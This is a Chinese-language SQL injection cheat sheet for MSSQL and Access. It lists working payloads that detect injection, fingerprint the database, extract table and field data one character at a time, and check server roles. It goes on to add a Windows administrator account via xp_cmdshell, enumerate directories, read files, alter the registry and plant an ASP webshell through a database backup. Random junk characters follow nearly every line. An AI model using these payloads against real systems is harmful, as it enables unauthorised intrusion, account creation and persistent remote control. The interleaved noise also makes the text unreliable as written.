1.判断是否有注入;and 1=1 ;and 1=2 ��loD�:4e1
2.初步判断是否是mssql ;and user>0 N��p?�/�r}
l��rmz�'M'
3.注入参数是字符'and [查询条件] and ''=' 7G%^8
ce{!
8p�]Krs��:
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �h@��{CMe�
`�L"l{^�cH
5.判断数据库系统 {'o\#4�Wk
�mW�#p&��{
;and (select count(*) from sysobjects)>0 mssql ��G�C@U[�'
~g�&G�i)je
;and (select count(*) from msysobjects)>0 access ?�V}�)2wwP
#Q��d"d3QG
(o8?j^ �-v
���w��Tn"
6.猜数据库 ;and (select Count(*) from [数据库名])>0 8cbgP�$X�
�G�T�W��5f
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �r�lkg.e6�
6S?*z
`v��
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 $u{ �8wF/)
}#E~XlX�^�
9.(1)猜字段的ascii值(access) bA�L!l\&�2
y�73@t$��|
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 0�Gn�bE2&
`BY&&Bv�#?
(2)猜字段的ascii值(mssql)
MU~n�vs;:
)%9��P ;�/
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 -;t]e��6[�
�*U�i>NTl�
10.测试权限结构(mssql) Z"a]AsG/Q#
z�b�P#y~[�
�3�o^���oq
d=:�&tOCg2
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- |I�=\+�P}s
~f]�I�0FK�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- J�/��^|�Y6
}P"JP�[#E\
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- VK?c='z��g
R�6�d�D17
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �G�A@Zfc�g
B��W%��"]J
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ;Ph�X�[y^*
}� �T1~�fa
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- c�G� I^IPI
"e~"-B7(\Y
;and 1=(select IS_MEMBER('db_owner'));-- k{j (Gb2sp
U)gr�C8 C�
e025m}%�SU
^DS+�O��>�
11.添加mssql和系统的帐户 WjvD C�"��
q=h~zjQ?R
;exec master.dbo.sp_addlogin username;-- �LV�p*YOq7
;exec master.dbo.sp_password null,username,password;-- Ye�t��!qmZ
�\~bE|jWbj
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 5x; �y�{qT
��hh>mX6A�
;exec master.dbo.xp_cmdshell 'net user username password f.�&Y_G3a<
J|�2OmbJ�e
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- O8%�Y� .SK
FGG��7�;0(
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ��F,-S��&d
QBi��LH]qa
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- yp:_�W��@�
_P*<T6\J�>
fUg��I�*V�
-O-�qE�Q�d
12.(1)遍历目录 )pA��N�_e"
��@dj��2#�
;create table dirs(paths varchar(100), id int) DIu�rFDQSS
^�N5BJ'[F:
;insert dirs exec master.dbo.xp_dirtree 'c:\' $}G0��3G@�
��.<C}/C�l
;and (select top 1 paths from dirs)>0 @fWmz,Ngl�
j�7)Xm,wI8
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) A+lP]Oy0S�
-Vi"h�SsUP
er?�'o1M��
�-S7rOq2Li
(2)遍历目录 }#/,��nJm'
o�(I[_oUy\
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- A�Z�C�bUkq
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 m1k+u�)7kD
��IP`��;hC
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 D��$RQ�D{*
{1y-*�@yU(
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 / ` 7p'i�
"�s]c�79�t
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ~� �YKB�xt
I�4�Y�s�,n
Zq-��-m/
J�['paHSF�
13.mssql中的存储过程 /2�&��jI�d
�b0�Ct��Qe
xp_regenumvalues 注册表根键, 子键 9�T�4x1{mO
#`C��;@#xr
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 rl�vo&��(a
hN6j�5.x%
xp_regread 根键,子键,键值名 tVZj��tGz=
V=}b>Jo2�j
;exec xp_regread vnXa4\Vd�y
@'��Df�Nka
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 g�(�\FG���
pC2�r{���-
xp_regwrite 根键,子键, 值名, 值类型, 值 \d0R&�vFHQ
��6�=��k�A
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ��T1p�A
<6
5u�K:f\y)l
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 zLlu%��Oc�
�;%Jw9�G\h
xp_regdeletevalue 根键,子键,值名 � b]s*z<|%
J'O<�/�o@e
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 >�_1*/o
JO
�Gw*n,�*pz
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 Da!�A1�|"�
d_&R�>GmR$
�:�lu�VsQ�
u{'�bd;.7�
14.mssql的backup创建webshell 8H3|i7.1h�
AHP_B&s,Qe
use model 3~\mP�\/4v
jR�S�0(8��
create table cmd(str image); %0�}qMY�S
=yi��R�B?�
insert into cmd(str) values (''); �lv�IKL!;H
Ql>��D�S~a
backup database model to disk='c:\l.asp'; RF
�4u\ �\
�LQ"5�6PP<
�<k'=_mC�_
Cs7YD�~,�
15.mssql内置函数 <�8��p53*a
8�/�*q#�j�
;and (select @@version)>0 获得Windows的版本号 QF(.fq8, U
<B�r�q7:n|
;and user_name()='dbo' 判断当前系统的连接用户是不是sa _ni�X�l&C�
��_e$15qW+
;and (select user_name())>0 爆当前系统的连接用户 B�Eyg��63=
��Qwb��=N�
;and (select db_name())>0 得到当前连接的数据库 I0=�YIcH5
�NyI0�[]z�
�v'�7�,(.E
ozF>2�`K
}
16.简洁的webshell �9hEI�f,\
Y"~I(,�nx!
use model tT87TmNsA
�4df��)�?/
create table cmd(str image); *��VH!<k[n
{,��tEe'H7
insert into cmd(str) values (''); D)�XF�@z�;
Iodk�1Y;��
backup database model to disk='g:\wwwtest\l.asp';
